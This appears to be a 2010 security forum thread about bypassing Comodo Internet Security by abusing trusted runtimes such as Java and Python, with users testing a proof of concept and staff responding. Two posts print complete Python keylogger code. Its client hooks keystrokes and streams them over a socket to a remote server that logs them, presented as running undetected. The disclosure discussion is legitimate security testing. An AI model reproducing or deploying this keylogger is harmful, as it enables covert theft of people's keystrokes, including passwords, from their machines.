Author Topic: How to kill CIS easily  (Read 25638 times)

Offline Dennis2

  • Global Moderator
  • Comodo's Hero
  • *****
  • Posts: 9684
Re: How to kill CIS easily
« Reply #30 on: May 16, 2010, 05:40:33 AM »
I have no idea why you think you will be banned you have not broken the Forum Policy.

If you look through the forum you will find numerous posts like this, everyone is entitled to their view whether it is the right one is another matter.

Thank you
Dennis
Moderator: Aims Forum a friendly place. Any concerns? Please PM me and/or review the Forum Policy 2012Updated.
System: Centos 7.9 x64, APF, HTTPS Everywhere, ABP, NoScript
 Fedora 35 x64, APF, HTTPS Everywhere, ABP

Offline brucine

  • Comodo's Hero
  • *****
  • Posts: 1533
Re: How to kill CIS easily
« Reply #31 on: May 16, 2010, 06:21:04 AM »
Quote
Why ? Because it is like a firewall, you allow an application like firefox to access to Internet. Ok it's great, firefox can access to outgoing 80 and 443. But, if I want to make an addon to spam people (like some other make a bittorent client), as I can use port 25, I'm able to do it, your firewall won't protect you.

??

My only allowed http ports for firefox are 80 and 443, and enforced by a specific firefox rule.
I don't see how firefox could connect through pop/smtp ports 25 and 110, and my mail client does not allow by default html view: whatever html mail is "quarantined" of the text message itself, and needs my aasentiment to be launched by the browser, then using port 80.

Offline fOrTy_7

  • Comodo's Hero
  • *****
  • Posts: 599
Re: How to kill CIS easily
« Reply #32 on: May 16, 2010, 06:58:14 AM »
Hi all,

As I said before, I think use safe list can be dangerous because hips don't handle it properly so we can use them to do what we want on the computer with all rights.

Today, I will show one way by using java. You can download it and try it (if you use vista (I didn't try on seven) you must run it has admin with the command java -jar kill_cis.jar ). You need to have install Comodo in partition C:\

Just execute kill_cis.jar, and reboot your machine (warning : as it works, use it on a test machine only). After restart, check CIS.

It's really a very very very very very very stupid method that works on Online armor too just because java is considered as safe application, so we just have to make a malware in java.

I've just tested it on Windows XP virtual machine and it works too. I haven't got a single popup while executing your PoC. After restarting virtual machine, cmdagent.exe doesn't start since it's empty file (0 bytes long), but I still get alerts from CIS. Those alerts got a little weird, most applications are unrecognised, but CIS still passes CLT tests flawlessly. I wouldn't say you killed CIS, it's altered but it still works. The question is, can it be further modified so it would work like a rouge internet security or self defence would prevent it.

I agree that better control of safe applications might be necessary, but always there need to be some trade off between security and the amount of alerts. No one would use HIPS which would popup an alert every mouse click event.  

Btw, Diagnostics couldn't repair the problem it found.


Edit:

It seems that, before CIS detects that there is something wrong with its initialization then it is fully vulnerable. And after running the PoC it takes unusually long (up to 10 minutes on virtual machine) for CIS to determinate that it couldn't be properly initialized. Well, malware won't wait that long to infect targeted system. And unless your using some third party AV which could catch that malware, then your system will be infected.
Considering these facts I must agree with Shaoran that his PoC kills CIS, because those few minutes are just enough for malware to do its work.


Why there is no developer comment regarding this issue  ??? 88)

[attachment deleted by admin]
« Last Edit: May 16, 2010, 08:11:58 AM by fOrTy_7 »

Offline Kyle

  • Computer Security Testing Group
  • Comodo's Hero
  • *****
  • Posts: 3679
Re: How to kill CIS easily
« Reply #33 on: May 18, 2010, 09:34:52 AM »
bump
Don't worry, be happy ????

*No longer active*

Offline Kyle

  • Computer Security Testing Group
  • Comodo's Hero
  • *****
  • Posts: 3679
Re: How to kill CIS easily
« Reply #34 on: May 19, 2010, 09:11:34 AM »
bump.
C'mon dev's   :THNK
Don't worry, be happy ????

*No longer active*

Offline darcjrt

  • Malware Research Group
  • Comodo's Hero
  • *****
  • Posts: 466
Re: How to kill CIS easily
« Reply #35 on: May 19, 2010, 03:53:52 PM »
I've just tested it on Windows XP virtual machine and it works too. I haven't got a single popup while executing your PoC. After restarting virtual machine, cmdagent.exe doesn't start since it's empty file (0 bytes long), but I still get alerts from CIS. Those alerts got a little weird, most applications are unrecognised, but CIS still passes CLT tests flawlessly. I wouldn't say you killed CIS, it's altered but it still works. The question is, can it be further modified so it would work like a rouge internet security or self defence would prevent it.

I agree that better control of safe applications might be necessary, but always there need to be some trade off between security and the amount of alerts. No one would use HIPS which would popup an alert every mouse click event.  

Btw, Diagnostics couldn't repair the problem it found.


Edit:

It seems that, before CIS detects that there is something wrong with its initialization then it is fully vulnerable. And after running the PoC it takes unusually long (up to 10 minutes on virtual machine) for CIS to determinate that it couldn't be properly initialized. Well, malware won't wait that long to infect targeted system. And unless your using some third party AV which could catch that malware, then your system will be infected.
Considering these facts I must agree with Shaoran that his PoC kills CIS, because those few minutes are just enough for malware to do its work.


Why there is no developer comment regarding this issue  ??? 88)

Those pics does not look pretty. Hope devs saw this and are already working on it. I use Linux, but I install and recommend CIS to my clients!!!
Best Regards,

J

Offline Kyle

  • Computer Security Testing Group
  • Comodo's Hero
  • *****
  • Posts: 3679
Re: How to kill CIS easily
« Reply #36 on: May 20, 2010, 08:11:54 PM »
Bump
Don't worry, be happy ????

*No longer active*

Offline evil_religion

  • Malware Research Group
  • Comodo's Hero
  • *****
  • Posts: 475
Re: How to kill CIS easily
« Reply #37 on: May 21, 2010, 09:40:23 AM »
I adviced long ago that D+ should treat scripts (*.bat, *.vbe...) and Java programes as own processes.
It's really a design flaw, other HIPSes have this feature.

Any developer comment?

Offline egemen

  • Comodo Staff
  • Comodo's Hero
  • *****
  • Posts: 3380
Re: How to kill CIS easily
« Reply #38 on: May 21, 2010, 10:14:52 AM »
Hi guys,

We are looking in to the issue. If there is a bug we will fix it.

Thanks for the feedback,
Egemen

Offline evil_religion

  • Malware Research Group
  • Comodo's Hero
  • *****
  • Posts: 475
Re: How to kill CIS easily
« Reply #39 on: May 21, 2010, 11:17:41 AM »
It's not a malfunction, it's a missing important feature.

Offline Kyle

  • Computer Security Testing Group
  • Comodo's Hero
  • *****
  • Posts: 3679
Re: How to kill CIS easily
« Reply #40 on: May 21, 2010, 07:07:05 PM »
Hi guys,

We are looking in to the issue. If there is a bug we will fix it.

Thanks for the feedback,
Egemen

Thx Egemen,
May you pls also take into my account of the suggested possible fix? You could sandbox threat-gates by default. A bit like Geswall does(Or even sandboxie if you configure it). Heres an overview;
http://www.gentlesecurity.com/overview.html
Don't worry, be happy ????

*No longer active*

Offline vix123

  • Comodo Loves me
  • ****
  • Posts: 123
  • I don't use an antivirus that doesn't pass VB100
Re: How to kill CIS easily
« Reply #41 on: May 25, 2010, 12:54:49 PM »
As I said before, I think use safe list can be dangerous because hips don't handle it properly so we can use them to do what we want on the computer with all rights.

I agree and that's why I always disable the Trust applications digitally signed by known vendors. The simple fact is that many of these applications (such as Internet Explorer or Windows services) have been compromised through buffer overflows in the past and will certainly be compromised in the future. Comodo would still trust them as they run malicious code.

Quote
Today, I will show one way by using java. You can download it and try it

Didn't work in my case. I am using normal restrictions for Java which prevent it from (among other things) changing protected registry keys. Why would Java be allowed to do that ? Defense+ properly caught and logged the attempt. (I am running XP SP3 as Administrator)

I believe it's a configuration issue, not a real flaw in Comodo.

Offline Kyle

  • Computer Security Testing Group
  • Comodo's Hero
  • *****
  • Posts: 3679
Re: How to kill CIS easily
« Reply #42 on: June 19, 2010, 08:13:37 PM »
Bump.. Just an update.  I'm able to host a server and successfully connect with other pc's over the internet and send information, without CIS alerting using the method being used here in this thread.

EDIT:
Can keylog and send info across no problems.

Server(Your pc)
Code: [Select]
#Key Logger
#Server
import socket
import logging
import sys
logFile = 'c:\log.txt'
logging.basicConfig(filename=logFile, level=logging.DEBUG)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('',6666))
s.listen(3)
conn, addr = s.accept()
print 'Client: ', addr[0]
logging.log(10,addr[0])
print 'Listening....'
while 1:
  try:
    data = conn.recv(500)
    if data:
      print data
      logging.log(10,data)
  except socket.error:
    logging.log(10,'END')
    print 'Connection at ', addr[0] ,' broken.'
    socket.socket(AF_INET,SOCK_DGRAM).close()
    sys.exit()


Client(persons pc who your listening too..)
Code: [Select]
#Key Logger
#Client
import pythoncom
import pyHook
import sys
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
addr=raw_input('What address would you like to connect to?')  
##You don't need to ask the user, this was just to test, u could enter the address here and it wouldn't ask.##  
port=input('What port would you like to use?')                                  
s.connect((addr,port))                                                                

def OnKeyboardEvent(event):
    s.send(chr(event.Ascii))
    return True

hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()

Btw.. Online armor doesn't alert about this either. If python is considered trusted- you could run what ever the heck u want to through here..
« Last Edit: June 24, 2010, 10:35:14 AM by Kyle »
Don't worry, be happy ????

*No longer active*

Offline lordraiden

  • Computer Security Testing Group
  • Comodo's Hero
  • *****
  • Posts: 921
Re: How to kill CIS easily
« Reply #43 on: September 15, 2010, 12:38:59 PM »
Bump.. Just an update.  I'm able to host a server and successfully connect with other pc's over the internet and send information, without CIS alerting using the method being used here in this thread.

EDIT:
Can keylog and send info across no problems.

Server(Your pc)
Code: [Select]
#Key Logger
#Server
import socket
import logging
import sys
logFile = 'c:\log.txt'
logging.basicConfig(filename=logFile, level=logging.DEBUG)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('',6666))
s.listen(3)
conn, addr = s.accept()
print 'Client: ', addr[0]
logging.log(10,addr[0])
print 'Listening....'
while 1:
  try:
    data = conn.recv(500)
    if data:
      print data
      logging.log(10,data)
  except socket.error:
    logging.log(10,'END')
    print 'Connection at ', addr[0] ,' broken.'
    socket.socket(AF_INET,SOCK_DGRAM).close()
    sys.exit()


Client(persons pc who your listening too..)
Code: [Select]
#Key Logger
#Client
import pythoncom
import pyHook
import sys
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
addr=raw_input('What address would you like to connect to?')   
##You don't need to ask the user, this was just to test, u could enter the address here and it wouldn't ask.##   
port=input('What port would you like to use?')                                   
s.connect((addr,port))                                                                 

def OnKeyboardEvent(event):
    s.send(chr(event.Ascii))
    return True

hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()

Btw.. Online armor doesn't alert about this either. If python is considered trusted- you could run what ever the heck u want to through here..

Bump!

Now all the malware in the sandbox can go to internet with the only protection of the Firewall

An option to automatically block the internet access and alert when an application is in the sandbox would be nice.
« Last Edit: September 15, 2010, 02:14:58 PM by lordraiden »

Offline Citizen K

  • Global Moderator
  • Comodo's Hero
  • *****
  • Posts: 26177
Re: How to kill CIS easily
« Reply #44 on: September 15, 2010, 02:37:16 PM »
Products like CIS do not prevent the user from making mistakes. If this could be installed by abusing a running program it would be a problem. But this looks like the user starting a script.

For those who care to read the manual of v5, which is now online as well you will find the following under Execution Control Settings:
Quote
Do heuristic command-line analysis for certain applications - Selecting this option instructs Comodo Internet Security to perform heuristic analysis of programs that are capable of executing code such as visual basic scripts and java applications. Example programs that are affected by enabling this option are wscript.exe, cmd.exe, java.exe and javaw.exe. For example, the program wscipt.exe can be made to execute visual basic scripts (.vbs file extension) via a command similar to “wscipt.exe c:\tests\test.vbs”. If this option is selected, CIS detects c:\tests\test.vbs from the commandline and applies all security checks based on this file. If test.vbs attempts to connect to the internet, for example, the alert will state ‘c:\tests\test.vbs’ is attempting to connect to the internet.
Hi guys,

We are looking in to the issue. If there is a bug we will fix it.

Thanks for the feedback,
Egemen
Looks like Comodo fixed it....

 

Free Endpoint Protection
Seo4Smf 2.0 © SmfMod.Com Smf Destek